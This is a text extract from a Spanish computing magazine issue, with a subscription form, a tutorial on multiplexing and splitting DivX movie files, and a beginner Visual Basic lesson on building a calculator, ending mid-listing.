Este será el número a partir del cual quieres subscribirte. Si deseas      Es imprescindible que nos facilites un mail o teléfono de contacto,
(por ejemplo) subscribirte a partir del número 5 (incluido), debes poner   puesto que 24 horas después de que recibamos tu petición de
un 5 y te enviaremos desde el 5 hasta el 15 (ambos incluidos)              subscripción te daremos un número de Cliente Preferente. Este
                                                                           número será utilizado para los sorteos.
APRECIACIONES:                                                             - Tipo de Subscripción: GIRO POSTAL
* Junto con el primer número recibirás el abono de 45 euros, precio        - Número de Revista:
de la subscripción por 11 números (un año) y una carta donde se te         Este será el número a partir del cual quieres subscribirte. Si deseas
indicará tu número de Cliente Preferente y justificante/factura de la      (por ejemplo) subscribirte a partir del número 5 (incluido), debes poner
subscripción.                                                              un 5 y te enviaremos desde el 5 hasta el 15 (ambos incluidos)
* Puedes hacernos llegar estos datos POR MAIL,tal como te hemos
indicado; rellenando el formulario de nuestra WEB                          APRECIACIONES:
(www.hackxcrack.com) o enviándonos una carta a la siguiente dirección:     * Junto con el primer número recibirás una carta donde se te indicará
CALLE HIGINIO ANGLES Nº2, 4º-1ª                                            tu número de Cliente Preferente y justificante/factura de la subscripción.
CP 43001 TARRAGONA                                                         * Puedes hacernos llegar estos datos POR MAIL,tal como te hemos
ESPAÑA                                                                     indicado; rellenando el formulario de nuestra WEB
* Cualquier consulta referente a las subscripciones puedes enviarla        (www.hackxcrack.com) o enviándonos una carta a la siguiente dirección:
por mail a preferente@hackxcrack.com                                       CALLE HIGINIO ANGLES Nº2, 4º-1ª
                                                                           CP 43001 TARRAGONA
                                                                           ESPAÑA
                                                                           * Cualquier consulta referente a las subscripciones puedes enviarla
                                                                           por mail a preferente@hackxcrack.com




   Página 24                                                                                                         PC PASO A PASO Nº 7
PASA TUS PROPIAS
               PELICULAS A DIVX;)
            PARTE IV: MULTIPLEXANDO
            De momento ya tenemos un archivo avi que         2. MULTIPLEXAR EL AC3 Y EL MP3
            contiene el video y un archivo ac3, mp3 u ogg
            que contiene el audio. Es hora de juntarlos en   Ambos formatos los vamos a multiplexar de la
            uno solo y tener nuestra película en un solo     misma forma, y con el mismo programa.
            archivo.                                         Necesitaremos el Nandub, que no es más que
                                                             un mod del virtualdub. Te explico, cuando te
            1. MULTIPLEXAR                                   bajaste el virtualdub de su página verías que
                                                             también tenías la posibilidad de descargarte el
            Multiplexar es propiamente juntar la parte del   código fuente del programa. Pues hay gente
            audio con la del video, pero no todo es un       que se ha dedicado a modificar el vdub en
            corta y pega que podamos hacer de cualquier      busca de solucionar sus exigencias, de esta
            forma. Algo muy importante en una película       forma surge el Nandub, desarrollado para hacer
            es que la imagen y el sonido sean síncronos,     dos pasadas en los tiempos en que el divx 3.11
            es decir, que el sonido suene justo cuando se    no permitía hacerlo, y con las opciones añadidas
            ve la acción que lo produce. Quedaría muy mal    de poder multiplexar no solo audio en pcm,
            ver como alguien se va todo cabreado, da un      sino también en mp3 y ac3. También veréis
            portazo y sin embargo no lo oímos hasta un       que en teoría, acepta el formato ogg, pero no
            segundo más tarde, nos resultaría raro, e        es recomendable usar el nandub para este
            incluso contribuiría en gran medida a no         formato porque en ocasiones el sonido a medida
            enterarnos de la película porque las cosas se    que avanza la película se va desfasando.
            oirían cuando no las esperamos.


  !            Con la multiplexación...


  Con la multiplexación haremos que el video y el audio se
  junten en un solo archivo



            Al sacar la pista de audio de los archivos
            con el dvd2avi, en el nombre del archivo
            que crea con el sonido, se incluye el
            tiempo de desfase que hemos de salvar
            a la hora de multiplexar. Este valor
            esta incluido en ms junto con la palabra
            delay.


            Otra de las ventajas del ogg es que esto no
            nos importará porque los propios programas
            que usamos ya lo corrigen automáticamente
            al leerlo en el nombre del archivo.


PC PASO A PASO Nº 7                                                                                             Página 25
DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO




            Para juntar los dos archivos lo primero que        ningún mod del virtualdub. Este caso vamos a
            tendremos que hacer es cargar el de                usar el OggMux:
            video, para ello nos vamos a la pestaña
            FileOpen video file.. Y seleccionamos
            nuestro archivo avi que contiene el video de
            la película.

            A continuación, y muy importante, nos
            iremos a la pestaña Video y seleccionaremos
            Direct Stream Copy, para que no modifique
            el video que tenemos. Ya solo queda seleccionar
            la pista de audio, para ello nos vamos
            a la pestaña audio y seleccionamos el
            tipo de pista que vamos a usar, ac3 o
            mp3, y seleccionamos el archivo de sonido
            que creamos anteriormente. De esta forma
            ya tenemos el audio que queremos
            juntar seleccionado. Tenemos que asegurarnos
            que en esta pestaña de audio también
            está marcada la opción Direct Stream
            Copy.                                              En primer lugar seleccionaremos el archivo que
                                                               contiene el video en la parte de Movie, pulsando
  !            Insistir en el tema...                          sobre los tres puntos (…), si quieres puedes
                                                               darle a Edit movie info y añadir la información
                                                               del titulo, autor, …
  Insistir en el tema del Direct Stream Copy
                                                               En Soundtracks seleccionaremos los archivos
                                                               de audio que queramos añadir. Y si, resalto el
            Ahora nos ocuparemos de que el audio y el          plural por una sencilla razón, con el ogg
            video sean síncronos, para ello en la carpeta      podemos añadir más de una pista de audio,
            audio pulsaremos sobre la opción Interleavin,      con lo que podremos tener el audio en español
            y en la casilla Audio Skew Correction              e inglés, por ejemplo. Con los otros codecs
            introduciremos el valor que nos indica el delay.   también se puede hacer, pero por cada pista
            En caso de no tener ningún delay, este paso        se chupa algo más de espacio. Me explico, al
            nos lo podríamos saltar. A continuación            juntar el video y el audio, el archivo resultante
            pulsamos OK, y ya tendremos el programa            es algo más grande que si sumas los tamaños,
            preparado para crear un archivo avi que            pero con ogg esto es prácticamente
            contenga el video en divx y el audio en mp3        despreciable.
            o ac3.
                                                               Para añadir las pistas de audio seleccionaremos
            Iremos a FileSave as avi… y el resto ya sabéis    los puntitos y la pista a añadir, a continuación
            como va.                                           le daremos al botón Add en el oggmux, ya que
                                                               sino, no se añadirá. En la lista debajo de los
            3.    MULTIPLEXAR                  EL   OGG        puntitos aparecen las pistas de audio que se
                                                               van a añadir. Además le puedes indicar el idioma
            Para multiplexar el ogg no vamos a utilizar        en que estará el sonido.

Página 26                                                                                           PC PASO A PASO Nº 7
DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO




          Hay otras dos opciones, una para añadir              de una pelea, o El Señor de los Anillos en
          subtítulos, que no usaremos porque no hemos          medio de la carrera por las minas de Moria.
          tratado el tema en ningún momento, y otra
          para añadir los capítulos que trae en el dvd,        Para el ogg podemos usar el OggCut, que es
          indicando la duración de cada uno. Información       un programa muy sencillo de usar que no
          que puedes obtener del archivo de texto que          explicaré. Además no es demasiado bueno.
          sacaba el smart ripper.
                                                               Hay un programa que nos va a servir para hacer
          Ya por último, en target, seleccionaremos donde      el postprocesado independientemente del
          queremos que saque el archivo resultante y           formato de audio, ¿adivináis lo que es?...,
          como queremos que se llame. Por último le            supongo que lo estaréis pensando, otro mod
          daremos a Mux File! Para que proceda con la          del virtual dub. Este directamente se llama
          multiplexación.                                      VirtualDub Mod, y no solo nos sirve para el
                                                               postprocesado, también para la multiplexación,
          El archivo resultante tendrá una extensión           pero así has conocido ya a dos mods del vdub.
          .ogm que puedes cambiarla por .avi sin miedo,        Por cierto, también vale para multiplexar los
          o dejarla como esta y asociar el archivo con         ogg.
          tu reproductor de video preferido. Para poder
          escuchar estas películas se necesitan los direct
          show filters del ogg.

          Hay que recordar que el ogg es un proyecto,
          ya se que me repito, pero es que puede que
          os de algún problema y no quiero que os
          cabreeis.


          4. EL POSTPROCESADO

          Esto consiste en manipular el archivo que
          hemos creado que contiene la película entera,
          es decir, video y audio juntos. La razón de que
          queramos manejarlo, es que por ejemplo, si           Lo que voy a explicar vale tanto para el
          decidimos hacer la película en dos CD´s, ahora       virtualdub, como para el nandub, como para el
          nos encontramos con un archivo de 1400 megas         vdub mod. De forma que si has decidido no
          que querremos cortar para poder copiarlo.            usar el ogg, no tienes porque hacerte con el
                                                               mod, te valdrá el Nandub.
          Yo recomiendo que cuando pretendáis hacer
          las películas para dos CD´s, no hagáis los
          cálculos para 1400 megas, sino para entre los            !             En esta ocasión...
          1300 y 1350, ya que os dará flexibilidad y
          margen de error en los resultados. La flexibilidad       En esta ocasión hablamos de dos mods del virtualdub, pero
          consiste en que a la hora de cortarla, si tenemos        si os ponéis a buscar es posible que encontréis otros muchos
          un archivo de cerca de los 1400 Mb, tendremos            que os ayuden en algún paso de la creación del divx
          que cortar el archivo justo por la mitad, lo que
          puede suponer cortar la película en un momento       Lo primero que tenemos que hacer es cargar el archivo avi
          poco apropiado, como si cortas Matrix en medio       como hemos hecho otras veces. A continuación, y muy

PC PASO A PASO Nº 7                                                                                                 Página 27
DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO - DIVX - VIDEO + AUDIO




            importante, es marcar en las pestañas de audio        5. THE END
            y video la opción Direct Stream Copy, además
            de señalar en la del audio la opción AVI audio,       Aquí concluye el artículo sobre el paso de DVD
            para que el audio que utilice sea el que ya esta      a DivX;). Espero que a los que no tenían ni
            en el avi cargado.                                    idea del tema les haya servido y a los que
                                                                  conocían el tema les haya interesado. Hay
            Lo siguiente es decidir donde queremos cortar         multitud de formas de pasar a divx una película
            la película. En función de lo que queramos            que tengamos en dvd, pero se ha elegido esta
            podemos usar varios métodos. En primer lugar,         para el artículo porque es la forma en la que
            con la barra de desplazamiento en el principio,       más se aprende. Si buscáis por la red
            pulsaremos el botón que es como una flecha            encontraréis muchos manuales de 3 hojas de
            negra apuntando a la izquierda, que marcará           Word que te explican a pasar una película, pero
            el inicio de la selección. (De los botones de         con los cuales no aprendes lo que estas
            abajo, los de mas a la derecha.)                      haciendo, no te dicen porque marcar una casilla
                                                                  o no, simplemente lo haces porque lo pone ahí,
            Ahora podemos mover la barra de                       y eso creo que va en contra del espíritu de esta
            desplazamiento hasta el punto donde queramos          publicación.
            cortar la película, o bien, si queremos cortarla
            en el cambio de capitulo X que está hacia el          Espero que para el día que salga el número 7
            medio, podemos ver en el txt del smartripper          a la calle los programas estén ya puestos en la
            el tiempo exacto en el que se produce el cambio       Web de Hack X Crack, no obstante, si tenéis
            e introducirlo en el dub dándole a EditGo to…        dificultades para encontrarlos, confiad en google
                                                                  y usad lo que os enseñaron en la revista para
            Una vez colocada en donde queremos cortar             conseguir programas.
            la barra de desplazamiento, pulsaremos sobre
            la flecha que señala hacia la derecha que             Saludotes.
            indicará el final de la selección. Verás como en
            la barra aparece un color azul que indica la
            selección.

            Ahora nos vamos a save as avi, y guardará en
            un archivo la primera parte de la película.

            Una vez acabado, y dado que la barra
            estará colocada donde acababa el primer
            trozo, pulsaremos sobre la flecha que mira a
            la izquierda, asegurándonos así que la marca
            de inicio de la segunda mitad coincide con la
            del final de la primera. Ahora nos vamos a
            EditEnd, de forma que la marca de la
            barra se colocará al final de la película. Pulsando
            otra vez sobre la flechita que mira a la
            derecha habremos hecho la selección
            de la segunda parte, que guardaremos de
            forma análoga a la primera.


Página 28                                                                                              PC PASO A PASO Nº 7
Un ejercicio esencial
                  la calculadora
                                          Por Pedro del Valle

          Bienvenidos de nuevo. Hoy, y a petición vuestra,
          adelantaremos temario y dejaremos atrás parte
          de la teoría que tenía pensado explicar para
          este artículo.

          Primero agradeceros a todos vuestras críticas
          en el foro de la revista, os garantizo que han
          sido escuchadas, tanto las buenas como las
          malas.

          Generalizando, hubo un grito unánime por
          parte vuestra, "más velocidad y más extenso",
          y por eso hoy, después de una ligera
          introducción a un nuevo concepto como son
          las variables, intentaremos crear de principio
                                                             Aquí es donde diseñaremos nuestra calculadora
          a fin una calculadora. Y no solo eso, sino que
                                                             así como la mayoría de los proyectos que
          una vez acabada intentaremos darle la vuelta
                                                             haremos durante los cursos. Para hacer una
          a la tortilla y complicar el ejercicio.
                                                             prueba con las variables utilizaremos el conocido
                                                             MsgBox.
          1. Algo de teoría: Las variables                   Tranquilos...., seré breve en este ejemplo, pero
                                                             creedme cuando digo que es totalmente
          Antes de explicar el extenso mundo de las          necesario.
          variables me gustaría dejar claro que lo que       Lo primero que debemos hacer es acceder al
          aquí voy a escribir puede ser mas o menos          editor del Visual Basic, para ello tenemos dos
          correcto según quien lo lea, pero de lo que        métodos, el primero es efectuar doble click
          podéis estar seguros es de que acabareis           sobre el formulario, como ya vimos en el primer
          entendiéndolo, y aun así, cada uno se hará su      curso. El otro método es haciendo click sobre
          propio concepto sobre las variables.               el botón blanco superior derecha que vemos
          Bien, una vez dicho esto, pasamos a explicarlo.    en la imagen.
          Las variables podrían ser considerados como
          pequeños espacios de memoria reservados
          para almacenar un tipo de dato predefinido
          anteriormente por el programador. En algunos
          casos el tipo de dato no está predefinido, por
          lo que lo adquiere a la hora de asignarle el
          valor (este ultimo caso es el que conocemos
          como variables de tipo "variant").
          Después de este tremendo "rollo"teórico,
          intentaré plasmar lo dicho en la práctica. Para
          ello debemos abrir el VB y elegir la opción "EXE
          stándard" en la ventana hija que nos aparece.
          Podemos observar que nos aparece un
          formulario vacío con el nombre "Form1".

PC PASO A PASO Nº 7                                                                                              Página 29
CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA




             Nosotros lo vamos a hacer, en esta ocasión,          estamos indicando que tipo de variable es.
             de la segunda manera. Al hacer click sobre           Cuando decimos "tipo de variable" nos estamos
             este botón nos va a aparecer un editor de            refiriendo al tipo de dato que podrá almacenar.
             texto. En este editor es donde nosotros              Para verlo mas claro, en este caso podremos
             "picaremos" el código de nuestros programas,         asignar una cadena de caracteres a nuestra
             como ya hicimos en la primera entrega del            variable, mientras que si la declaráramos de
             curso.                                               tipo "Integer" (entro) aquí solo podríamos
             En esta ocasión vamos a declarar una variable.       almacenar datos de tipo entero (numéricos),
             Para hacer esto, primero debemos indicarle el        como podrían ser 1, 2, 1320, 6789.....
             ámbito.                                              Aquí tenéis un listado de las variables mas
                                                                  utilizadas que podéis declarar en Visual Basic
                                                                  Nuestra variable es de tipo "String" (cadena)
  !             El ámbito...                                      porque va a almacenar un literal, que será por
                                                                  ejemplo "HXC"
  El ámbito de la variable nos indica donde puede ser utilizada   Para asignar un valor a una variable tenemos
  esta, es decir, puede ser local al formulario o global (ya      que utilizar el operador "=" (en un futuro
  veremos esto en el futuro) al proyecto                          explicaremos los diferentes operadores)
                                                                  Para esto debemos acceder a algún evento, ya
                                                                  que es necesario decirle al programa cuando
             En este caso escribiremos:                           vamos a realizar la asignación.
                                                                  Por ejemplo, vamos a hacerlo en el evento que
             dim NombreVariable as String                         conocimos en el primer curso, "Form_Load".
                                                                  Para llegar hasta él podemos hacerlo de varias
             "Dim" nos indica, como ya hemos dicho antes,         formas, pero para no dar mas rodeos, lo
             el ámbito de la variable. "NombreVariable" es        haremos desplegando los "combos" que
             el nombre con el que nos vamos a referir a la        encontramos en la zona superior del compilador.
             variable, que puede ser el que vosotros queráis.     Desplegamos el izquierdo y vemos que en la
             "as String", esto es lo más importante. Aquí         lista aparece la palabra "form"




Página 30                                                                                            PC PASO A PASO Nº 7
CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA




                                                             Código del programa:

                                                             Dim Var1 As String

                                                             Private Sub Form_Load()
                                                               Var1 = "HXC"
                                                               MsgBox Var1
                                                             End Sub

                                                             2. Los Objetos: Empecemos la
                                                             calculadora

                                                             Para esta practica necesitamos conocer dos
                                                             objetos: El botón (button) y la caja de texto
                                                             (textbox). Tanto uno como otro son auténticos
          Al hacer click veremos que el editor nos añade     clásicos en los formularios de cualquier
          las líneas del evento automáticamente, y           aplicación. En la imagen podemos observar
          también que nos coloca el cursor entre ellas.      cuales son estos objetos:
          El combo de la derecha se ha puesto
          directamente sobre el evento "load", pero si
          lo desplegamos, podremos acceder a cualquier
          evento del Form.
          Ahora vamos a asignar el valor a la variable,
          según se puede ver en la siguiente instrucción:

          Var1 = "HXC"

          Donde "Var1" es el nombre de la variable que
          vosotros habéis elegido.
          Vale, ahora hemos llegado a un punto en el
          cual deberíais entender que vuestra variable,
          al ejecutar la aplicación, almacenará el literal
          "HXC".
          Para ver esto vamos a escribir justo debajo
                                                             Para colocarlos en nuestro "Form1" solo tenemos
          MsgBox Var1                                        que hacer click sobre el objeto que queremos
                                                             dibujar y darle forma sobre el formulario (como
          Ahora ejecutemos con ctr + F5                      si estuviéramos haciendo cuadrados en el Paint).
          ¿Os ha salido el MsgBox con el literal HXC?,       Nosotros, como vamos a hacer una calculadora,
          ¿Sí?, pues entonces lo habéis hecho bien, pero     necesitaremos un TextBox y varios Buttons
          eso no importa, porque esto tan solo es la         (tantos como funciones queramos implementar
          introducción a las variables, así que es           en la calculadora).
          infinitamente más importante que entendáis         Probad ahora a poner un botón en el formulario.
          lo que habéis hecho, y si no es así, volver a      ¿Ya está?, pues entonces os debería aparecer
          leéoslo todo, porque si no, jamás aprenderéis      sobre el botón un texto que diga "Command1".
          a programar.                                       Este es el nombre y descripción que VB pone

PC PASO A PASO Nº 7                                                                                             Página 31
CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA




            por defecto a este control. Podéis ver que si        si os viene en gana, pero unos nombres
            añadís otro le llamará "Command2", y un             ambiguos provocan dificultades a la hora de
            tercero sería "Command3".                           programar.
            Ahora vamos a cambiarle el nombre y la              Para cambiar la descripción del objeto iremos
            descripción a un botón. Antes de hacer esto         a su propiedad "Caption" y cambiaremos el
            debéis entender que el nombre del botón es          contenido, poniendo el símbolo "=", y
            como nosotros nos hacemos referencia a él           comprobando como el texto del botón lo
            desde el editor del VB, y la descripción            adquiere inmediatamente.
            ("Caption")es el literal que vemos escrito sobre    Ahora colocaremos el botón en la zona inferior,
            el botón, que puede ser el mismo que el             arrastrándolo, y crearemos todos los demás
            nombre.                                             necesarios, pudiendo coger como ejemplo la
            Para cambiarlo nos posicionamos con el ratón        calculadora de la imagen.
            encima del objeto que queremos modificar (en
            nuestro caso el botón, pero podría ser cualquier
            otro). Al hacer click sobre el vemos que adquiere
            el foco, esto se puede comprobar porque
            aparecen 6 cuadros pequeños de color azul en
            el perímetro del objeto.
            ¿Lo tenemos? ¿Sí? Vamos entonces al cuadro
            de propiedades del botón.




                                                                Para los nombres de los botones no nos debemos
                                                                complicar la vida, por ejemplo, yo los he llamado
            y cambiamos el texto que hay en la casilla          "Cmd1, Cmd2, Cmd3, CmdDiv, CmdIgual,
            "Nombre", o en su defecto, "Name" en las            CmdMas....", así será más fácil distinguirlos.
            versiones inglesas del producto.
            Ahora pone "Command1", y nosotros lo vamos
            a llamar "CmdIgual". La razón de que lo
                                                                    !            Ta m b i é n p o d e m o s . . .
            llamemos así es porque este botón será el
                                                                    También podemos cambiar tanto el nombre como la
            símbolo "=" de nuestra calculador, donde "Cmd"
                                                                    descripción al form, para esto haremos exactamente lo
            es la abreviatura de "Command Button" e
                                                                    mismo que con el botón, click sobre un área descubierta
            "Igual" es lo que hemos elegido para
                                                                    del formulario y cambiar sus propiedades en el cuadro.
            identificarlo. También lo podéis llamar "pepe"


Página 32                                                                                            PC PASO A PASO Nº 7
CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA




          Hay un detalle distinto en el TextBox, y es que       nada. Esto sería así:
          este no tiene Caption. La propiedad que indica
          en los TextBox que texto / descripción va a           Private Sub Cmd0_Click()
          tener es la propiedad Text, así que la vamos            TxtOper.Text = TxtOper.Text & "0"
          a buscar y borrar su contenido ("Text1") para         End Sub
          que la caja de texto nos quede en blanco.
                                                                Si nos fijamos bien vemos que le estamos
                                                                obligando a poner en la propiedad Text lo que
          3.       El código: usando el editor                  actualmente hay en ella mas el "0" (el operador
                                                                "&" en VB sirve principalmente para concatenar
          Vamos a empezar a "picar" código. Lo primero          cadenas).
          será pasar el valor del botón presionado a la         Si ejecutamos esto y presionamos varias veces
          caja de texto. Para esto haremos doble click          el botón vemos que nos aparecen tantos "0"
          sobre el primero botón con valor numérico que         como clicks hagamos.
          habéis puesto (el 0). Vemos que rápidamente
          nos aparece el editor de texto, con el cursor         Entonces, el código para todos los botones con
          activo entre dos líneas de código que el solo         números quedaría así
          nos ha escrito. Este es el evento "Click" del
          botón, es decir, todo lo que aquí escribamos          Private Sub Cmd0_Click()
          se ejecutará cuando alguien haga click en este          TxtOper.Text = TxtOper.Text & "0"
          objeto.                                               End Sub


          ¿Y que es lo que queremos que pase cuando             Private Sub Cmd1_Click()
          se haga click? Pues queremos que el valor del           TxtOper.Text = TxtOper.Text & "1"
          botón pase a la caja de texto, y eso lo haremos       End Sub
          así
                                                                Private Sub Cmd2_Click()
          Private Sub Cmd0_Click()                                TxtOper.Text = TxtOper.Text & "2"
            TxtOper.Text = "0"                                  End Sub
          End Sub
                                                                Private Sub Cmd3_Click()
          Aquí estamos diciéndole que cuando se presione          TxtOper.Text = TxtOper.Text & "3"
          el botón "0" el Text de nuestra caja de texto         End Sub
          (en mi caso "TxtOper") adquiera ese valor.
          Para probar esto podemos ejecutar con                 Private Sub Cmd4_Click()
           "ctr + F5" y presionar el botón que hemos              TxtOper.Text = TxtOper.Text & "4"
          codificado (para unificar espero que todos            End Sub
          escojáis primero el 0). Si habéis hecho bien el
          ejercicio os aparecerá un 0 en el TextBox.            Private Sub Cmd5_Click()
                                                                  TxtOper.Text = TxtOper.Text & "5"
          Pero esto no es suficiente, ya que aquí estamos       End Sub
          sustituyendo el valor de la propiedad Text de
          la caja de texto por un número, cuando lo que         Private Sub Cmd6_Click()
          queremos hacer es concatenar el valor que               TxtOper.Text = TxtOper.Text & "6"
          contiene la caja y añadirle el nuevo, sin sustituir   End Sub


PC PASO A PASO Nº 7                                                                                               Página 33
CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA




             Private Sub Cmd7_Click()                              variable StrOper cuando alguien presione este
                   TxtOper.Text = TxtOper.Text & "7"              botón. Quedaría así:
             End Sub
                                                                  Private Sub CmdMas_Click()
             Private Sub Cmd8_Click()                               StrOper = "+"
                   TxtOper.Text = TxtOper.Text & "8"              End Sub
             End Sub

             Private Sub Cmd9_Click()
                                                                      !           El operador...
                   TxtOper.Text = TxtOper.Text & "9"
             End Sub                                                  El operador "=" se encarga de asignar valores tanto a
                                                                      variables como a objetos
             Si ahora ejecutamos tenemos que poder escribir
             cualquier número.
             Muy bien, esto parece que empieza a funcionar,       Pero se nos olvida algo. Cabe recordar que
             pero más de uno se estará preguntando: ¿y            cuando se presiona un operador en una
             los botones igual, por, mas, menos...?¿Qué...?       calculadora (sea digital o real) se limpia el
             Pues para estos botones vamos a utilizar una         "display" (caja de texto en nuestro caso) para
             variable. La tenemos que declarar de tipo            poder escribir el segundo dígito que va a operar
             String, ya que va a contener el carácter del         con el primero.
             operador (*,-,/,+). La cosa quedaría así:            Algunos pensareis que podemos solucionarlo
                                                                  poniendo TxtOper.Text="" (esta instrucción
             Dim StrOper As String                                pone blanco la caja de texto), pero si hacemos
                                                                  esto perdemos el primer valor, así que no
                                                                  podríamos operar. Para no perder el primer
  !             Si antes de...
                                                                  valor vamos a guardarlo en la variable que
                                                                  anteriormente nos hemos declarado como Long.
  Si antes de declarar la variable añadimos la cláusula Option    El evento quedaría así:
  Explicit" estamos obligando a que todas las variables sean
                                                                  Private Sub CmdMas_Click()
  declaradas. Esto es altamente recomendable.
                                                                    StrOper = "+"
                                                                    LngValor = TxtOper.Text
                                                                    TxtOper.Text = ""
             donde "StrOper" es el nombre que queráis
                                                                  End Sub
             darle a la variable ("Str" por ser String y "Oper"
             porque contendrá el operador).                       Debemos hacer lo mismo en todos los botones
             Ya que estamos, también vamos a declarar             con operadores, guardando el símbolo "-" en
             otra variable de tipo Long, la cual nos será         la resta, el "/" en la división y el "*" en el
             muy útil en un futuro próximo.                       producto.
                                                                  Así es como nos quedaría:
             Dim LngValor as Long
                                                                  Private Sub CmdDiv_Click()
             Vamos al evento Click del botón "+". Una vez           StrOper = "/"
             dentro de él tenemos que indicarle que este            LngValor = TxtOper.Text
             botón es el que hace referencia a la suma,             TxtOper.Text = ""
             ¿cómo?, pues añadiendo el valor "+" a nuestra        End Sub

Página 34                                                                                             PC PASO A PASO Nº 7
CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA




          Private Sub CmdMas_Click()                         Una vez entendido esto, vamos a intentar
            StrOper = "+"                                    llevarlo a la calculadora. En nuestro botón igual
            LngValor = TxtOper.Text                          tenemos dos intereses muy claros, saber el
            TxtOper.Text = ""                                valor de StrOper y operar en consecuencia
          End Sub                                            entre el valor que almacenamos en el primer
                                                             dígito (LngValor) y el segundo (TxtOper.Text).
          Private Sub CmdMenos_Click()                       Entonces, y ya que hoy os he enseñado la
            StrOper = "-"                                    sentencia "If", os propongo que codifiquéis
            LngValor = TxtOper.Text                          todas las posibilidades que pueden haber (estas
            TxtOper.Text = ""                                posibilidades ahora solo son 4, suma, producto,
          End Sub                                            división y resta).
                                                             Nuestro botón CmdIgual debería cobrar un
          Private Sub CmdPor_Click()                         aspecto como este:
            StrOper = "*"
            LngValor = TxtOper.Text                          Private Sub CmdIgual_Click()
            TxtOper.Text = ""                                  If StrOper = "+" Then
          End Sub
                                                               End If
          4. Muy importante: Sentencias                        If StrOper = "-" Then
          condicionales
                                                               End If
                                                               If StrOper = "*" Then
          Entramos en una parte muy delicada, el botón
          igual. En este botón vamos a operar, y
                                                               End If
          devolveremos el valor a la caja de texto una
                                                               If StrOper = "/" Then
          vez obtenido el resultado. Tenemos que estar
          atentos porque las sentencias condicionales
                                                               End If
          son utilizadas constantemente por los
                                                             End Sub
          programadores, independientemente del
          lenguaje y del tipo de programa que se va a
                                                             Este código hará que, dependiendo del operador
          realizar. Una sentencia condicional no es más
                                                             pulsado, entre en una u otra sentencia
          que una condición, la cual se cumple o no, es
                                                             condicional, pero solo en una, ya que StrOper
          decir, la pregunta
                                                             no puede valer "+" y a su vez "/" . Ahora
          Si StrOper es igual a '+' entonces
                                                             codificaremos el código que va entre los "If"
                    Suma
                                                             (comienzo de la sentencia) y "End If" (final de
          Fin del Sí
                                                             la sentencia).
          Sería una sentencia condicional. Esto traducido
          a código sería:
                                                                 !            En el caso...
            If StrOper = "+" Then
                   MsgBox "HXC"
            End If                                               En el caso de las sentencias condicionales el operador "="
                                                                 se utiliza para comparar, al igual que > (mayor que) <
          Aquí estamos diciendo que si la variable StrOper       (menor que) >= (mayor o igual que) <= (menor o igual
          contiene el valor "+" se muestre por pantalla          que) <> (diferente).
          un mensaje.


PC PASO A PASO Nº 7                                                                                              Página 35
CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA




            Por ejemplo, en el caso de la suma, dentro de               TxtOper = LngValor - TxtOper.Text
            la sentencia deberíamos poner                      End If

              If StrOper = "+" Then                            If StrOper = "*" Then
                     TxtOper = LngValor + TxtOper.Text                TxtOper = LngValor * TxtOper.Text
              End If                                           End If

            Sigamos paso a paso lo que esto hace. Primero      If StrOper = "/" Then
            la sentencia "If" pregunta si StrOper contiene            TxtOper = LngValor / TxtOper.Text
            el valor "+". Como nosotros hemos presionado       End If
            este operador, la sentencia dará "verdadero",    End Sub
            por lo tanto entrará dentro y continuará con
            la siguiente línea de código.                    Ejecutemos. Si os da errores estaos tranquilos,
            Entonces llegamos a TxtOper = LngValor +         sentaos y mirar exactamente que error es,
            TxtOper.Text                                     seguro que lo sabéis solucionar.
            Esto lo que hace es que almacena en el TextBox   Si no os da errores, felicidades, probad a sumar,
            "TxtOper" el valor resultante de la suma entre   restar dividir y multiplicar, pero sobre todo,
            lo que habíamos guardado en LngValor mas         probad a añadir mas botones que hagan otras
            lo que actualmente hay en TxtOper. Cabe          operaciones (como un botón borrar que vacié
            resaltar que para poder efectuar esto, primero   el TextBox y la variable LngValor).
            el proceso matemático resuelve LngValor +        Por hoy nada mas, espero que halláis entendido
            TxtOper.Text y después lo almacena en TxtOper    el programa y os halla resultado ameno el
            de nuevo, ya que si lo hiciese de otra forma     curso, me despido de todos vosotros.
            estaríamos perdiendo el valor de TxtOper antes   Un saludo, Pedro del Valle
            de realizar la suma.
                                                             http://www.hackhispano.com

  !            Vemos que...                                  CODIGO DEL PROGRAMA:

  Vemos que en la línea TxtOper = LngValor + TxtOper.Text    Option Explicit
  hemos omitido la propiedad .Text en el primer TxtOper.     Dim StrOper As String
  Esto lo he hecho para que veáis que sigue funcionando      Dim LngValor As Long
  aunque no lo pongamos, y es debido a que .Text es la
  propiedad por defecto de cualquier TextBox, aunque yo      Private Sub Cmd0_Click()
  recomiendo encarecidamente que no se omita.                  TxtOper.Text = TxtOper.Text & "0"
                                                             End Sub

            Ahora hacemos lo mismo para todos los            Private Sub Cmd1_Click()
            operadores, quedándonos el botón CmdIgual          TxtOper.Text = TxtOper.Text & "1"
            Así:                                             End Sub

            Private Sub CmdIgual_Click()                     Private Sub Cmd2_Click()
              If StrOper = "+" Then                            TxtOper.Text = TxtOper.Text & "2"
                     TxtOper = LngValor + TxtOper.Text       End Sub
              End If
              If StrOper = "-" Then                          Private Sub Cmd3_Click()

Página 36                                                                                          PC PASO A PASO Nº 7
CURSO DE PROGRAMACION - VISUAL BASIC - CALCULADORA




               TxtOper.Text = TxtOper.Text & "3"                  TxtOper = LngValor / TxtOper.Text
          End Sub                                        End If
                                                       End Sub
          Private Sub Cmd4_Click()
                TxtOper.Text = TxtOper.Text & "4"      Private Sub CmdMas_Click()
          End Sub                                        StrOper = "+"
                                                         LngValor = TxtOper.Text
          Private Sub Cmd5_Click()                       TxtOper.Text = ""
                TxtOper.Text = TxtOper.Text & "5"      End Sub
          End Sub
                                                       Private Sub CmdMenos_Click()
          Private Sub Cmd6_Click()                       StrOper = "-"
                TxtOper.Text = TxtOper.Text & "6"        LngValor = TxtOper.Text
          End Sub                                        TxtOper.Text = ""
                                                       End Sub
          Private Sub Cmd7_Click()
